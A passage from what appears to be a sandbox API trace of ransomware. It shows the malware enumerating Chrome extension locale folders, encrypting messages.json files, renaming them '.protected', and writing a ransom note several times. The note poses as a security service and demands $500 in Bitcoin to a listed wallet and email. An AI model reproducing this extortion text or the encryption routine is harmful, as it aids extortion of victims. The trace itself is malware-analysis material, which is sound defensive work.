Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\se\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.524] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.524] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.525] lstrlenA (lpString="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") returned 684 [0081.525] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.525] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.525] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.525] CloseHandle (hObject=0x164) returned 1 [0081.525] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.525] lstrcmpiW (lpString1="sk", lpString2="Windows") returned -1 [0081.525] lstrcmpiW (lpString1="sk", lpString2="Program Files") returned 1 [0081.525] lstrcmpiW (lpString1="sk", lpString2="Program Files (x86)") returned 1 [0081.525] lstrcmpiW (lpString1="sk", lpString2="$Recycle.bin") returned 1 [0081.525] lstrcmpiW (lpString1="sk", lpString2="System Volume Information") returned -1 [0081.525] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk") returned 141 [0081.525] lstrcmpW (lpString1="sk", lpString2=".") returned 1 [0081.525] lstrcmpW (lpString1="sk", lpString2="..") returned 1 [0081.525] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\*") returned 143 [0081.525] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.525] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.525] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.525] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.525] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.525] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.525] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\.") returned 143 [0081.525] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.525] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.525] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.525] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.525] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.525] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.525] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.525] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\..") returned 144 [0081.525] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.525] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.526] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.526] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.526] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.526] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.526] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.526] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.526] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json") 
returned 155 [0081.526] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.526] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.526] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.526] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.526] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json") returned 155 [0081.526] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json") returned 155 [0081.526] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.526] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json") returned 155 [0081.526] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.526] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0081.527] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff22, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.527] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xde, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xde, lpOverlapped=0x0) returned 1 [0081.527] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.527] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.527] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.528] CloseHandle (hObject=0x168) returned 1 [0081.528] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.protected") returned 165 [0081.528] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\messages.json.protected")) returned 1 [0081.528] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.528] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.528] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\RESTORE_FILES.txt") returned 159 [0081.528] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sk\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.529] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.529] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.529] lstrlenA (lpString="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") returned 684 [0081.529] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0081.530] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0081.530] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, 
lpOverlapped=0x0) returned 1 [0081.530] CloseHandle (hObject=0x164) returned 1 [0081.530] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0081.530] lstrcmpiW (lpString1="sl", lpString2="Windows") returned -1 [0081.530] lstrcmpiW (lpString1="sl", lpString2="Program Files") returned 1 [0081.530] lstrcmpiW (lpString1="sl", lpString2="Program Files (x86)") returned 1 [0081.530] lstrcmpiW (lpString1="sl", lpString2="$Recycle.bin") returned 1 [0081.530] lstrcmpiW (lpString1="sl", lpString2="System Volume Information") returned -1 [0081.530] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl") returned 141 [0081.530] lstrcmpW (lpString1="sl", lpString2=".") returned 1 [0081.530] lstrcmpW (lpString1="sl", lpString2="..") returned 1 [0081.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\*") returned 143 [0081.530] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0081.530] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0081.530] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0081.530] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0081.530] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0081.530] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0081.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | 
out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\.") returned 143 [0081.530] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0081.530] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.530] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0081.530] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0081.530] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0081.530] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0081.530] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0081.530] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\..") returned 144 [0081.530] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0081.530] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0081.530] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0081.530] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0081.530] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0081.531] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0081.531] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0081.531] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0081.531] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json") 
returned 155 [0081.531] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0081.531] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0081.531] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0081.531] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0081.531] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0081.531] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json") returned 155 [0081.531] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0081.531] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json") returned 155 [0081.531] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0081.531] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json") returned 155 [0081.531] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0081.531] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, 
nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0081.532] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff16, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0081.532] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xea, lpOverlapped=0x0) returned 1 [0081.532] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0081.532] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0081.532] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0081.532] CloseHandle (hObject=0x168) returned 1 [0081.532] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.protected") returned 165 [0081.532] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS 
HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\messages.json.protected")) returned 1 [0081.533] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0081.533] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0081.533] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\RESTORE_FILES.txt") returned 159 [0081.533] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\pjkljhegncpnkpknbcohdijeoejaedia\\8.1_0\\_locales\\sl\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0081.533] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. 
\r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0081.533] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0081.534] lstrlenA 